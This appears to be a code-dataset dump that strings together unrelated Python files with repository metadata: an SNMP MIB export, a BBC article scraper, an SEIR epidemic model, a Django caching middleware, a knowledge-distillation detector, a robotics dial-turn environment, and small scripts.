ss7DestinationCongestedAlarmTableEntry=ss7DestinationCongestedAlarmTableEntry, ifTimeStamp=ifTimeStamp, partitionSpaceStatus=partitionSpaceStatus, linkCardDeviceName=linkCardDeviceName, maxCPUUsage=maxCPUUsage, mateServerHostName=mateServerHostName, linkNumMSUDiscarded=linkNumMSUDiscarded, inCallAbnormalCompletions=inCallAbnormalCompletions, ncServerId=ncServerId, serverCLLI=serverCLLI, inservicePorts=inservicePorts, ncEthernetName=ncEthernetName, nasMaxPortsUsed=nasMaxPortsUsed, lsTimeStamp=lsTimeStamp, ss7LinkAlignmentFailureClear=ss7LinkAlignmentFailureClear, phoneCurrentlyActiveDialCalls=phoneCurrentlyActiveDialCalls, phoneUserUnavailableDialCallRejects=phoneUserUnavailableDialCallRejects, csg=csg, ncFoundServerTrap=ncFoundServerTrap, systemOMs=systemOMs, ncClusterIP=ncClusterIP, compSecsInCurrentState=compSecsInCurrentState, abnormalReleaseInCallRejects=abnormalReleaseInCallRejects, nasCumulativeActiveInCalls=nasCumulativeActiveInCalls, ncAvailabilityState=ncAvailabilityState, inserviceCards=inserviceCards, trunkCumulativeActiveOutCalls=trunkCumulativeActiveOutCalls, linkAlignTimeStamp=linkAlignTimeStamp, hgAlarmTableEntry=hgAlarmTableEntry, trunkUserBusyInCallRejects=trunkUserBusyInCallRejects, csgComplexCLLI=csgComplexCLLI, linkAlignLinkCode=linkAlignLinkCode, destState=destState, ifIndex=ifIndex, ss7LinksetFailureAlarmTable=ss7LinksetFailureAlarmTable, uBATimerExpiries=uBATimerExpiries, ss7DestinationCongestedAlarmTable=ss7DestinationCongestedAlarmTable, alarmMaskInt1=alarmMaskInt1, lfKey=lfKey, lastUpdateOMFile=lastUpdateOMFile, linkAlignCardId=linkAlignCardId, genericNormal=genericNormal, lfLinkCode=lfLinkCode, lcTimeStamp=lcTimeStamp, nasStatusClear=nasStatusClear, currentlyActiveDigitalOutCalls=currentlyActiveDigitalOutCalls, LinkCongestionState=LinkCongestionState, nasKey=nasKey, cplxLocOperationalState=cplxLocOperationalState, linkNumMSUTransmitted=linkNumMSUTransmitted, linkCongestions=linkCongestions, ncStandbyState=ncStandbyState, ss7ISUPCongestionAlarmTable=ss7ISUPCongestionAlarmTable, nasOtherOutCallRejects=nasOtherOutCallRejects, linkInhibitionState=linkInhibitionState, genericMinor=genericMinor, hgAlarmTable=hgAlarmTable, ncOperationalState=ncOperationalState, phoneCurrentlyActiveAnalogDialCalls=phoneCurrentlyActiveAnalogDialCalls, trunkUserUnavailableInCallRejects=trunkUserUnavailableInCallRejects, UpgradeInProgress=UpgradeInProgress, alarms=alarms, compDebugTimeStamp=compDebugTimeStamp, cplxMateEthernetIP=cplxMateEthernetIP, trunkCallOMIndex=trunkCallOMIndex, lfName=lfName, userBusyInCallRejects=userBusyInCallRejects, linkRemoteProcOutages=linkRemoteProcOutages, trapGenericStr1=trapGenericStr1, linkAlignKey=linkAlignKey, genericCritical=genericCritical, abnormalReleaseOutCallRejects=abnormalReleaseOutCallRejects, ncServer=ncServer, compProvStateTimeStamp=compProvStateTimeStamp, ss7LinkAlignmentAlarmTableEntry=ss7LinkAlignmentAlarmTableEntry, mtp3Name=mtp3Name, destCongestKey=destCongestKey, hgStatusClear=hgStatusClear, trapName=trapName, userCPUUsage=userCPUUsage, linkOMTable=linkOMTable, ss7ISUPFailureAlarm=ss7ISUPFailureAlarm, ss7MTP3CongestionMinor=ss7MTP3CongestionMinor, partitionIndex=partitionIndex, genericMajor=genericMajor, lcLinkCode=lcLinkCode, alarmMaskInt2=alarmMaskInt2, ncStateChangeTrap=ncStateChangeTrap, ss7MTP3CongestionAlarmTable=ss7MTP3CongestionAlarmTable, remoteBusyInCCSs=remoteBusyInCCSs, csgComplexStateTrapInfo=csgComplexStateTrapInfo, aliveNASes=aliveNASes, destCongestIPAddress=destCongestIPAddress, trunkGroupOMs=trunkGroupOMs, otherOutCallRejects=otherOutCallRejects, lsFailurePointcode=lsFailurePointcode, trapFileName=trapFileName, ss7LinkAlignmentAlarmTable=ss7LinkAlignmentAlarmTable, destIndex=destIndex, destCongestName=destCongestName, nasCurrentlyInUsePorts=nasCurrentlyInUsePorts, systemCallRate=systemCallRate, mtp2TimeStamp=mtp2TimeStamp, linkNumUnexpectedMsgs=linkNumUnexpectedMsgs, trapCompName=trapCompName, linkNumSIFTransmitted=linkNumSIFTransmitted, ncEthernetIP=ncEthernetIP, nortel=nortel, tempFailOutCallRejects=tempFailOutCallRejects, inserviceCircuits=inserviceCircuits, destInaccessIPAddress=destInaccessIPAddress, linksetState=linksetState, cplxLocAvailabilityState=cplxLocAvailabilityState, nasOutCallAbnormalCompletions=nasOutCallAbnormalCompletions, ss7LinkFailureAlarmTable=ss7LinkFailureAlarmTable, ss7LinkCongestionAlarm=ss7LinkCongestionAlarm, restartStateClear=restartStateClear, alarmStatusInt2=alarmStatusInt2, trunkCurrentlyActiveDigitalInCalls=trunkCurrentlyActiveDigitalInCalls, ss7ISUPCongestionClear=ss7ISUPCongestionClear, lfIndex=lfIndex, linkTableEntry=linkTableEntry, mtp2Name=mtp2Name, mtp3IPAddress=mtp3IPAddress, ncUpgradeInProgress=ncUpgradeInProgress, nasOutCallAttempts=nasOutCallAttempts, lfLinkSet=lfLinkSet, provisionedCircuits=provisionedCircuits, partitionTable=partitionTable, ss7LinkCongestionAlarmTable=ss7LinkCongestionAlarmTable, serverMemSize=serverMemSize, ss7LinkFailureClear=ss7LinkFailureClear, trunkInCallAttempts=trunkInCallAttempts, mtp2Index=mtp2Index, trapIdKey=trapIdKey, phoneCallOMTableEntry=phoneCallOMTableEntry, ss7LinksetFailureAlarm=ss7LinksetFailureAlarm)
mibBuilder.exportSymbols("InternetThruway-MIB", icIPAddress=icIPAddress, trunkCumulativeActiveInCalls=trunkCumulativeActiveInCalls, lfTimeStamp=lfTimeStamp, ss7LinkFailureAlarm=ss7LinkFailureAlarm, partitionMegsFree=partitionMegsFree, compStateClear=compStateClear, lsFailureIndex=lsFailureIndex, cumulativeActiveInCalls=cumulativeActiveInCalls, ss7LinksetFailureClear=ss7LinksetFailureClear, linksetId=linksetId, linkOMSetId=linkOMSetId, hgKey=hgKey, csgComplexStateTrapCritical=csgComplexStateTrapCritical, linkNumMSUReceived=linkNumMSUReceived, ss7LinksetFailureAlarmTableEntry=ss7LinksetFailureAlarmTableEntry, partitionName=partitionName, icKey=icKey, ss7MTP3CongestionMajor=ss7MTP3CongestionMajor, icCongestionLevel=icCongestionLevel, trunkCurrentlyActiveOutCalls=trunkCurrentlyActiveOutCalls, avgLoad=avgLoad, compDebugOff=compDebugOff, nasCurrentlyActiveDigitalInCalls=nasCurrentlyActiveDigitalInCalls, destCongestIndex=destCongestIndex, restartStateAlarm=restartStateAlarm, trunkInCallAbnormalCompletions=trunkInCallAbnormalCompletions, trunkAbnormalReleaseInCallRejects=trunkAbnormalReleaseInCallRejects, linksetIndex=linksetIndex, mtp2IPAddress=mtp2IPAddress, ifIPAddress=ifIPAddress, lsFailureName=lsFailureName, nasAlarmTimeStamp=nasAlarmTimeStamp, trafficInCCSIncomings=trafficInCCSIncomings, nasTempFailOutCallRejects=nasTempFailOutCallRejects, routeState=routeState, DestinationState=DestinationState, linkInhibits=linkInhibits, compRestartTimeStamp=compRestartTimeStamp, ss7MTP3CongestionClear=ss7MTP3CongestionClear, nasInCallNormalCompletions=nasInCallNormalCompletions, MTP2AlarmConditionType=MTP2AlarmConditionType, linkId=linkId, ss7ISUPFailureClear=ss7ISUPFailureClear, componentName=componentName, lcCardId=lcCardId, nasOMs=nasOMs, disk=disk, nasIndex=nasIndex, trunkCurrentlyActiveAnalogOutCalls=trunkCurrentlyActiveAnalogOutCalls, ncClusterName=ncClusterName, trunkCurrentlyActiveDigitalOutCalls=trunkCurrentlyActiveDigitalOutCalls, routeDestPointCode=routeDestPointCode, LinkState=LinkState, nasAlarmTable=nasAlarmTable, destCongestTimeStamp=destCongestTimeStamp, cplxAlarmStatus=cplxAlarmStatus, lsIndex=lsIndex, ss7=ss7, nasAbnormalReleaseOutCallRejects=nasAbnormalReleaseOutCallRejects, currentlyActiveOutCalls=currentlyActiveOutCalls, ComponentIndex=ComponentIndex, hgIndex=hgIndex, lostServerAlarmTable=lostServerAlarmTable, localBusyInCCSs=localBusyInCCSs, currentlyActiveAnalogOutCalls=currentlyActiveAnalogOutCalls, ss7LinkCongestionClear=ss7LinkCongestionClear, ss7DestinationCongestedClear=ss7DestinationCongestedClear, mtp3CongestionLevel=mtp3CongestionLevel, callOMs=callOMs, tempFailInCallRejects=tempFailInCallRejects, lcIndex=lcIndex, trunkOutCallAbnormalCompletions=trunkOutCallAbnormalCompletions, phoneUserBusyDialCallRejects=phoneUserBusyDialCallRejects, ss7ISUPCongestionAlarm=ss7ISUPCongestionAlarm, linkAlignIndex=linkAlignIndex, inCallNormalCompletions=inCallNormalCompletions, ifName=ifName, currentlyActiveAnalogInCalls=currentlyActiveAnalogInCalls, routeRank=routeRank, phoneDialCallAbnormalCompletions=phoneDialCallAbnormalCompletions, phoneTempFailDialCallRejects=phoneTempFailDialCallRejects, otherInCallRejects=otherInCallRejects, routeTableEntry=routeTableEntry, trapDate=trapDate, userUnavailableOutCallRejects=userUnavailableOutCallRejects, trapIPAddress=trapIPAddress, cplxMateEthernetName=cplxMateEthernetName, phoneCallOMTable=phoneCallOMTable, serverIpAddress=serverIpAddress, trunkTempFailOutCallRejects=trunkTempFailOutCallRejects, compRestartStatus=compRestartStatus, nasOutCallNormalCompletions=nasOutCallNormalCompletions, ss7DestinationInaccessible=ss7DestinationInaccessible, bLATimerExpiries=bLATimerExpiries, trunkAllActiveCalls=trunkAllActiveCalls, destInaccessName=destInaccessName, system=system, nasOtherInCallRejects=nasOtherInCallRejects, cplxName=cplxName, trunkUserBusyOutCallRejects=trunkUserBusyOutCallRejects, nasInCallAttempts=nasInCallAttempts, lcName=lcName, nasCurrentlyActiveAnalogOutCalls=nasCurrentlyActiveAnalogOutCalls, dialaccess=dialaccess, trapTimeStamp=trapTimeStamp, trunkCurrentlyActiveInCalls=trunkCurrentlyActiveInCalls, linkNumAutoChangeovers=linkNumAutoChangeovers, diskSpaceClear=diskSpaceClear, omData=omData, linkAlignName=linkAlignName, nasName1=nasName1, ss7LinkFailureAlarmTableEntry=ss7LinkFailureAlarmTableEntry, etherCardTrapMajor=etherCardTrapMajor, LinkInhibitionState=LinkInhibitionState, components=components, linkCongestionState=linkCongestionState, ss7MTP3CongestionAlarmTableEntry=ss7MTP3CongestionAlarmTableEntry, destInaccessKey=destInaccessKey, trunkCallOMTable=trunkCallOMTable, alarmStatusInt3=alarmStatusInt3, ss7ISUPCongestionAlarmTableEntry=ss7ISUPCongestionAlarmTableEntry, ifKey=ifKey, serverHostName=serverHostName, compProvStateKey=compProvStateKey, nasMinPortsUsed=nasMinPortsUsed, etherCardTrapCritical=etherCardTrapCritical, ComponentSysmanState=ComponentSysmanState, trunkCurrentlyActiveAnalogInCalls=trunkCurrentlyActiveAnalogInCalls, nasAbnormalReleaseInCallRejects=nasAbnormalReleaseInCallRejects, ss7ISUPFailureAlarmTable=ss7ISUPFailureAlarmTable, mtp2AlarmCondition=mtp2AlarmCondition, trunkOutCallNormalCompletions=trunkOutCallNormalCompletions, etherCardTrapClear=etherCardTrapClear, linkTransmittedMSUs=linkTransmittedMSUs, cplxLocEthernetIP=cplxLocEthernetIP, traps=traps, ncServerName=ncServerName, phoneCumulativeActiveDialCalls=phoneCumulativeActiveDialCalls, partitionTableEntry=partitionTableEntry, linkOMId=linkOMId, csgComplexStateTrapMajor=csgComplexStateTrapMajor, ncHostName=ncHostName, numberOfCircuits=numberOfCircuits, linkTable=linkTable, ss7MTP2TrunkFailureAlarmTable=ss7MTP2TrunkFailureAlarmTable, trunkInCallNormalCompletions=trunkInCallNormalCompletions, linkAlignmentState=linkAlignmentState, outCallAbnormalCompletions=outCallAbnormalCompletions, nasCallOMIndex=nasCallOMIndex, phoneAbnormalReleaseDialCallRejects=phoneAbnormalReleaseDialCallRejects, destRuleId=destRuleId, nasCmplxName=nasCmplxName, lsFailureIPAddress=lsFailureIPAddress, partitionSpaceKey=partitionSpaceKey, ss7DestinationInaccessibleAlarmTableEntry=ss7DestinationInaccessibleAlarmTableEntry, hgStatusAlarm=hgStatusAlarm, inCallAttempts=inCallAttempts, linkState=linkState, ss7MTP2TrunkFailureClear=ss7MTP2TrunkFailureClear, nasAllActiveCalls=nasAllActiveCalls, compDebugOn=compDebugOn, destCongestCongestionLevel=destCongestCongestionLevel, mtp3Key=mtp3Key, linkReceivedMSUs=linkReceivedMSUs, ss7LinkAlignmentFailureAlarm=ss7LinkAlignmentFailureAlarm, linksetAdjPointcode=linksetAdjPointcode, routeLinksetId=routeLinksetId, phoneCurrentlyActiveDigitalDialCalls=phoneCurrentlyActiveDigitalDialCalls, nasCurrentlyActiveAnalogInCalls=nasCurrentlyActiveAnalogInCalls, trunkTempFailInCallRejects=trunkTempFailInCallRejects, trunkCallOMTableEntry=trunkCallOMTableEntry, diskSpaceAlarm=diskSpaceAlarm, mtp3Index=mtp3Index, nasUserBusyOutCallRejects=nasUserBusyOutCallRejects, lsFailureKey=lsFailureKey, hgAlarmTimeStamp=hgAlarmTimeStamp, mtp3TimeStamp=mtp3TimeStamp, componentTableEntry=componentTableEntry, outCallAttempts=outCallAttempts, cplxLocStandbyState=cplxLocStandbyState, trunkAbnormalReleaseOutCallRejects=trunkAbnormalReleaseOutCallRejects, destInaccessTimeStamp=destInaccessTimeStamp)
| 127.231942 | 9,703 | 0.781809 | 2,594 | 0.016363 | 0 | 0 | 0 | 0 | 0 | 0 | 49,652 | 0.313201 |
b9f67833672023bef782862284907976acb9371f | 2,216 | py | Python | newsparser.py | antoreep-jana/BBC-News-Analyzer | 0a6e54ddf4baefa4532213c5e6f60e712ff3a1ca | [
"MIT"
] | 1 | 2021-12-27T12:57:07.000Z | 2021-12-27T12:57:07.000Z | newsparser.py | antoreep-jana/BBC-News-Analyzer | 0a6e54ddf4baefa4532213c5e6f60e712ff3a1ca | [
"MIT"
] | null | null | null | newsparser.py | antoreep-jana/BBC-News-Analyzer | 0a6e54ddf4baefa4532213c5e6f60e712ff3a1ca | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup as bs
import requests
class BBC:
def __init__(self, url:str):
article = requests.get(url)
self.soup = bs(article.content, "html.parser")
#print(dir(self.soup))
#print(self.soup.h1.text)
self.body = self.get_body()
self.link = url
self.title = self.get_title()
self.author = self.get_author()
self.images = self.get_images()
self.date = self.get_date()
#author = self.soup.find
#date = self.soup
#for img in imgs:
# print(img['src'])
paras = self.soup.find_all('div', {"class" : "ssrcss-17j9f6r-RichTextContainer e5tfeyi1"})
#for para in paras:
# print(para.text)
def get_body(self) -> list:
#body = self.soup.find(property="articleBody")
paras = self.soup.find_all('div', {"class" : "ssrcss-17j9f6r-RichTextContainer e5tfeyi1"})
#for para in paras:
# print(para.text)
return [p.text for p in paras]
#return [p.text for p in body.find_all("p")]
def get_title(self) -> str:
#return self.soup.find(class_="story-body__h1").text
return self.soup.h1.text
def get_author(self) -> str:
author = self.soup.find('p', {'class' : 'ssrcss-1rv0moy-Contributor e5xb54n2'})
return author.text.replace("BBC News", "")
def get_images(self) -> list:
imgs = self.soup.find_all('figure', {'class' : 'ssrcss-wpgbih-StyledFigure e34k3c23'})
imgs_lst = []
for img in imgs:
try:
if "blank_white_space" not in img.img['src']:
imgs_lst.append(img.img['src'])#['div']['span']['span']['img'])
except:
pass
return imgs_lst
def get_date(self) -> str:
date = self.soup.find_all('time')[0]
return date['datetime']
parsed = BBC("https://www.bbc.co.uk/news/world-europe-49345912")
#print(parsed.title)
#print(parsed.link)
#print(parsed.author)
#print(parsed.date)
#print(parsed.title)
#print(parsed.body)
#print(parsed.images)
#print(parsed.body)
| 28.410256 | 98 | 0.564982 | 1,921 | 0.866877 | 0 | 0 | 0 | 0 | 0 | 0 | 859 | 0.387635 |
b9f73f41171ea9b93f4f79bc336c9fe6927dba89 | 2,044 | py | Python | SIR_model-Copy.Caroline.1.py | Caroline-Odevall/final-project-team-18 | fbf00ae4ec554dee9245a9834ff4108b3d339842 | [
"MIT"
] | null | null | null | SIR_model-Copy.Caroline.1.py | Caroline-Odevall/final-project-team-18 | fbf00ae4ec554dee9245a9834ff4108b3d339842 | [
"MIT"
] | null | null | null | SIR_model-Copy.Caroline.1.py | Caroline-Odevall/final-project-team-18 | fbf00ae4ec554dee9245a9834ff4108b3d339842 | [
"MIT"
] | null | null | null | # In[42]:
from scipy.integrate import odeint
import numpy as np
import matplotlib.pyplot as plt
# In[43]:
# describe the model
def deriv(y, t, N, beta, gamma, delta):
S, E, I, R = y
dSdt = -beta * S * I / N # S(t) – susceptible (de som är mottagliga för infektion).
dEdt = beta * S * I / N - gamma * E
dIdt = delta * E - gamma * I # I(t) – infected (de som har pågående infektion)
dRdt = gamma * I
return dSdt, dEdt, dIdt, dRdt
# In[44]:
# describe the parameters
N = 2283 #Totala befolkningen N=s(t)+I(t)+R(t)
D = 4.0 #infections last four days
gamma = 1.0 / D #Reoval rate (Hur många som tillfrisknar)
delta = 1.0 / 5.0 #incubation period of five days
R_0 = 2.5 #Reproduktionstalet
beta = R_0 * gamma #r_0=beta/gamma. antal som smittas per infekterad och per tid (beror på virusets egenskaper samt hur vi beter oss).
S0, E0, I0, R0 = N-1, 1, 0, 0 # initial conditions: one infected, rest susceptible
#Rt = R0 * S(t)/Ntot* (1 – b). b = effekt av policy och beteendeförändringar
# In[45]:
t = np.linspace(0, 99, 100) # Grid of time points (in days)
y0 = S0, E0, I0, R0 # Initial conditions vector
# Integrate the SIR equations over the time grid, t.
ret = odeint(deriv, y0, t, args=(N, beta, gamma, delta))
S, E, I, R = ret.T
# In[46]:
def plotsir(t, S, E, I, R):
f, ax = plt.subplots(1,1,figsize=(10,4))
ax.plot(t, S, 'b', alpha=0.7, linewidth=2, label='Susceptible')
ax.plot(t, E, 'y', alpha=0.7, linewidth=2, label='Exposed')
ax.plot(t, I, 'r', alpha=0.7, linewidth=2, label='Infected')
ax.plot(t, R, 'g', alpha=0.7, linewidth=2, label='Recovered')
ax.set_xlabel('Time (days)')
ax.yaxis.set_tick_params(length=0)
ax.xaxis.set_tick_params(length=0)
ax.grid(b=True, which='major', c='w', lw=2, ls='-')
legend = ax.legend()
legend.get_frame().set_alpha(0.5)
for spine in ('top', 'right', 'bottom', 'left'):
ax.spines[spine].set_visible(False)
plt.savefig('Plot.png')
plt.show();
# plot the graph
# In[47]:
plotsir(t, S, E, I, R)
# In[ ]:
| 24.333333 | 137 | 0.630137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 879 | 0.427114 |
b9f778c162a3f42e748bada544f1b060ab9f29ed | 466 | py | Python | Condicionales anidados.py | gcardosov/PythonAprendeOrg | 0cad81f0a584c98389ca729a337d30581780e520 | [
"MIT"
] | 1 | 2018-03-07T05:26:12.000Z | 2018-03-07T05:26:12.000Z | Condicionales anidados.py | gcardosov/PythonAprendeOrg | 0cad81f0a584c98389ca729a337d30581780e520 | [
"MIT"
] | null | null | null | Condicionales anidados.py | gcardosov/PythonAprendeOrg | 0cad81f0a584c98389ca729a337d30581780e520 | [
"MIT"
] | null | null | null | pregunta = input('trabajas desde casa? ')
if pregunta == True:
print 'Eres afortunado'
if pregunta == False:
print 'Trabajas fuera de casa'
tiempo = input('Cuantos minutos haces al trabajo: ')
if tiempo == 0:
print 'trabajas desde casa'
elif tiempo <=20:
print 'Es poco tiempo'
elif tiempo >= 21 and tiempo <=45:
print 'Es un tiempo razonable'
else:
print 'Busca otras rutas'
| 20.26087 | 57 | 0.583691 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 180 | 0.386266 |
b9f8215f5040fa71b2646d52a053545a92c3fd12 | 1,681 | py | Python | app/middleware/cache_headers.py | Niclnx/service-stac | ad9129a7130d09b2bed387d8e82575eb86fdfa7b | [
"BSD-3-Clause"
] | 9 | 2020-08-17T11:01:48.000Z | 2022-01-17T22:24:13.000Z | app/middleware/cache_headers.py | Niclnx/service-stac | ad9129a7130d09b2bed387d8e82575eb86fdfa7b | [
"BSD-3-Clause"
] | 100 | 2020-08-14T05:56:40.000Z | 2022-03-01T22:39:58.000Z | app/middleware/cache_headers.py | Niclnx/service-stac | ad9129a7130d09b2bed387d8e82575eb86fdfa7b | [
"BSD-3-Clause"
] | 3 | 2020-09-02T14:01:07.000Z | 2021-07-27T06:30:26.000Z | import logging
import re
from urllib.parse import urlparse
from django.conf import settings
from django.utils.cache import add_never_cache_headers
from django.utils.cache import patch_cache_control
from django.utils.cache import patch_response_headers
logger = logging.getLogger(__name__)
STAC_BASE = settings.STAC_BASE
STAC_BASE_V = settings.STAC_BASE_V
class CacheHeadersMiddleware:
'''Middleware that adds appropriate cache headers to GET and HEAD methods.
NOTE: /checker, /get-token, /metrics and /{healthcheck} endpoints are marked as never cache.
'''
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
# Code to be executed for each request before
# the view (and later middleware) are called.
response = self.get_response(request)
# Code to be executed for each request/response after
# the view is called.
# match /xxx or /api/stac/xxx
# f.ex. /metrics, /checker, /api/stac/{healthcheck}, /api/stac/get-token
if re.match(fr'^(/{STAC_BASE})?/\w+$', request.path):
add_never_cache_headers(response)
elif (
request.method in ('GET', 'HEAD') and
not request.path.startswith(urlparse(settings.STATIC_URL).path)
):
logger.debug(
"Patching cache headers for request %s %s",
request.method,
request.path,
extra={"request": request}
)
patch_response_headers(response, settings.CACHE_MIDDLEWARE_SECONDS)
patch_cache_control(response, public=True)
return response
| 32.960784 | 96 | 0.662701 | 1,320 | 0.785247 | 0 | 0 | 0 | 0 | 0 | 0 | 532 | 0.316478 |
b9f87264f50f9243a592053fcbe97aca0b8c2377 | 2,818 | py | Python | mmdet/models/detectors/knowledge_distilling/kd_single_stage.py | anorthman/mmdetection | 52e28154364f0e19d11c206bb357d88f29fc4a2d | [
"Apache-2.0"
] | 5 | 2019-06-11T11:08:54.000Z | 2021-03-25T10:06:01.000Z | mmdet/models/detectors/knowledge_distilling/kd_single_stage.py | anorthman/mmdetection | 52e28154364f0e19d11c206bb357d88f29fc4a2d | [
"Apache-2.0"
] | null | null | null | mmdet/models/detectors/knowledge_distilling/kd_single_stage.py | anorthman/mmdetection | 52e28154364f0e19d11c206bb357d88f29fc4a2d | [
"Apache-2.0"
] | 1 | 2019-06-11T11:08:55.000Z | 2019-06-11T11:08:55.000Z | # author huangchuanhong
import torch
from mmcv.runner import load_checkpoint
from ..base import BaseDetector
from ..single_stage import SingleStageDetector
from ...registry import DETECTORS
from ...builder import build_detector
@DETECTORS.register_module
class KDSingleStageDetector(SingleStageDetector):
def __init__(self,
backbone,
teacher,
neck=None,
bbox_head=None,
train_cfg=None,
test_cfg=None,
pretrained=None):
super(KDSingleStageDetector, self).__init__(backbone,
neck=neck,
bbox_head=bbox_head,
train_cfg=train_cfg,
test_cfg=test_cfg,
pretrained=pretrained)
self.teacher_detector = build_detector(teacher.model, train_cfg=None, test_cfg=test_cfg)
load_checkpoint(self.teacher_detector, teacher.checkpoint)
self.teacher_detector.eval()
self.beta = train_cfg.teacher.beta
def forward_train(self,
img,
img_metas,
gt_bboxes,
gt_labels,
gt_bboxes_ignore=None,
beta=1000.):
feats = ()
backbone_feats = self.backbone(img)
if self.train_cfg.teacher.backbone_at:
for i in self.train_cfg.teacher.backbone_at_idxes:
feats += (backbone_feats[i],)
if self.with_neck:
neck_feats = self.neck(backbone_feats)
if self.train_cfg.teacher.neck_at:
feats += neck_feats
outs = self.bbox_head(neck_feats)
else:
outs = self.bbox_head(backbone_feats)
with torch.no_grad():
t_feats = ()
t_backbone_feats = self.teacher_detector.backbone(img)
if self.train_cfg.teacher.backbone_at:
for i in self.train_cfg.teacher.backbone_at_idxes:
t_feats += (t_backbone_feats[i],)
if self.with_neck:
t_neck_feats = self.teacher_detector.neck(t_backbone_feats)
if self.train_cfg.teacher.neck_at:
t_feats += t_neck_feats
t_outs = self.teacher_detector.bbox_head(t_neck_feats)
else:
t_outs = self.teacher_detector.bbox_head(t_backbone_feats)
loss_inputs = (feats,) + outs + (t_feats,) + t_outs + (gt_bboxes, gt_labels, img_metas, self.train_cfg)
losses = self.bbox_head.loss(
*loss_inputs, gt_bboxes_ignore=gt_bboxes_ignore)
return losses
| 42.059701 | 112 | 0.551455 | 2,560 | 0.908446 | 0 | 0 | 2,587 | 0.918027 | 0 | 0 | 23 | 0.008162 |
b9f8cb65181ebad752b9a810d28cc601137f1877 | 4,518 | py | Python | metaworld/envs/mujoco/sawyer_xyz/v2/sawyer_dial_turn_v2.py | yiwc/robotics-world | 48efda3a8ea6741b35828b02860f45753252e376 | [
"MIT"
] | 681 | 2019-09-09T19:34:37.000Z | 2022-03-31T12:17:58.000Z | metaworld/envs/mujoco/sawyer_xyz/v2/sawyer_dial_turn_v2.py | yiwc/robotics-world | 48efda3a8ea6741b35828b02860f45753252e376 | [
"MIT"
] | 212 | 2019-09-18T14:43:44.000Z | 2022-03-27T22:21:00.000Z | metaworld/envs/mujoco/sawyer_xyz/v2/sawyer_dial_turn_v2.py | yiwc/robotics-world | 48efda3a8ea6741b35828b02860f45753252e376 | [
"MIT"
] | 157 | 2019-09-12T05:06:05.000Z | 2022-03-29T14:47:24.000Z | import numpy as np
from gym.spaces import Box
from metaworld.envs import reward_utils
from metaworld.envs.asset_path_utils import full_v2_path_for
from metaworld.envs.mujoco.sawyer_xyz.sawyer_xyz_env import SawyerXYZEnv, _assert_task_is_set
class SawyerDialTurnEnvV2(SawyerXYZEnv):
TARGET_RADIUS = 0.07
def __init__(self):
hand_low = (-0.5, 0.40, 0.05)
hand_high = (0.5, 1, 0.5)
obj_low = (-0.1, 0.7, 0.0)
obj_high = (0.1, 0.8, 0.0)
goal_low = (-0.1, 0.73, 0.0299)
goal_high = (0.1, 0.83, 0.0301)
super().__init__(
self.model_name,
hand_low=hand_low,
hand_high=hand_high,
)
self.init_config = {
'obj_init_pos': np.array([0, 0.7, 0.0]),
'hand_init_pos': np.array([0, 0.6, 0.2], dtype=np.float32),
}
self.goal = np.array([0., 0.73, 0.08])
self.obj_init_pos = self.init_config['obj_init_pos']
self.hand_init_pos = self.init_config['hand_init_pos']
self._random_reset_space = Box(
np.array(obj_low),
np.array(obj_high),
)
self.goal_space = Box(np.array(goal_low), np.array(goal_high))
@property
def model_name(self):
return full_v2_path_for('sawyer_xyz/sawyer_dial.xml')
@_assert_task_is_set
def evaluate_state(self, obs, action):
(reward,
tcp_to_obj,
_,
target_to_obj,
object_grasped,
in_place) = self.compute_reward(action, obs)
info = {
'success': float(target_to_obj <= self.TARGET_RADIUS),
'near_object': float(tcp_to_obj <= 0.01),
'grasp_success': 1.,
'grasp_reward': object_grasped,
'in_place_reward': in_place,
'obj_to_target': target_to_obj,
'unscaled_reward': reward,
}
return reward, info
def _get_pos_objects(self):
dial_center = self.get_body_com('dial').copy()
dial_angle_rad = self.data.get_joint_qpos('knob_Joint_1')
offset = np.array([
np.sin(dial_angle_rad),
-np.cos(dial_angle_rad),
0
])
dial_radius = 0.05
offset *= dial_radius
return dial_center + offset
def _get_quat_objects(self):
return self.sim.data.get_body_xquat('dial')
def reset_model(self):
self._reset_hand()
self._target_pos = self.goal.copy()
self.obj_init_pos = self.init_config['obj_init_pos']
self.prev_obs = self._get_curr_obs_combined_no_goal()
if self.random_init:
goal_pos = self._get_state_rand_vec()
self.obj_init_pos = goal_pos[:3]
final_pos = goal_pos.copy() + np.array([0, 0.03, 0.03])
self._target_pos = final_pos
self.sim.model.body_pos[self.model.body_name2id('dial')] = self.obj_init_pos
self.dial_push_position = self._get_pos_objects() + np.array([0.05, 0.02, 0.09])
return self._get_obs()
def compute_reward(self, action, obs):
obj = self._get_pos_objects()
dial_push_position = self._get_pos_objects() + np.array([0.05, 0.02, 0.09])
tcp = self.tcp_center
target = self._target_pos.copy()
target_to_obj = (obj - target)
target_to_obj = np.linalg.norm(target_to_obj)
target_to_obj_init = (self.dial_push_position - target)
target_to_obj_init = np.linalg.norm(target_to_obj_init)
in_place = reward_utils.tolerance(
target_to_obj,
bounds=(0, self.TARGET_RADIUS),
margin=abs(target_to_obj_init - self.TARGET_RADIUS),
sigmoid='long_tail',
)
dial_reach_radius = 0.005
tcp_to_obj = np.linalg.norm(dial_push_position - tcp)
tcp_to_obj_init = np.linalg.norm(self.dial_push_position - self.init_tcp)
reach = reward_utils.tolerance(
tcp_to_obj,
bounds=(0, dial_reach_radius),
margin=abs(tcp_to_obj_init-dial_reach_radius),
sigmoid='gaussian',
)
gripper_closed = min(max(0, action[-1]), 1)
reach = reward_utils.hamacher_product(reach, gripper_closed)
tcp_opened = 0
object_grasped = reach
reward = 10 * reward_utils.hamacher_product(reach, in_place)
return (reward,
tcp_to_obj,
tcp_opened,
target_to_obj,
object_grasped,
in_place)
| 31.816901 | 93 | 0.599823 | 4,273 | 0.945772 | 0 | 0 | 692 | 0.153165 | 0 | 0 | 253 | 0.055998 |
b9fa33196acc6d33e769b7c8e96ca3b00aeee8cc | 237 | wsgi | Python | obviforum/obviforum.wsgi | dcloutman/obviforum | 31af0cf6f2e243bff9d920276831415bd5210cf9 | [
"MIT"
] | null | null | null | obviforum/obviforum.wsgi | dcloutman/obviforum | 31af0cf6f2e243bff9d920276831415bd5210cf9 | [
"MIT"
] | null | null | null | obviforum/obviforum.wsgi | dcloutman/obviforum | 31af0cf6f2e243bff9d920276831415bd5210cf9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys
import logging
import os
logging.basicConfig(stream=sys.stderr)
file_dir = os.path.dirname(os.path.realpath(__file__))
